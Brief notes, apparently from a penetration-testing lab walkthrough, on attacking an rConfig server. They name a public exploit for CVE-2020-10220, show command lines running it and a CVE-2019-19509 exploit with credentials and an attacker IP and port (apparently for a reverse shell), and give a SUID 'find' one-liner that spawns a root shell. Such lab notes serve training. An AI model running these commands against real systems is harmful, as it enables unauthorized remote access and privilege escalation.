Searching for vulnerabilites we found: https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
Modifying request to verify=False to prevent SSL errors.
python3 rconfig_CVE-2020-10220.py https://192.168.241.57:8081
Now we can use this exploit after modifying all request.get() by adding verify=False
python3 rconfig_CVE-2019-19509.py https://192.168.241.57:8081 admin abgrtyu 192.168.45.166 8081
/usr/bin/find . -exec /bin/sh -p \; -quit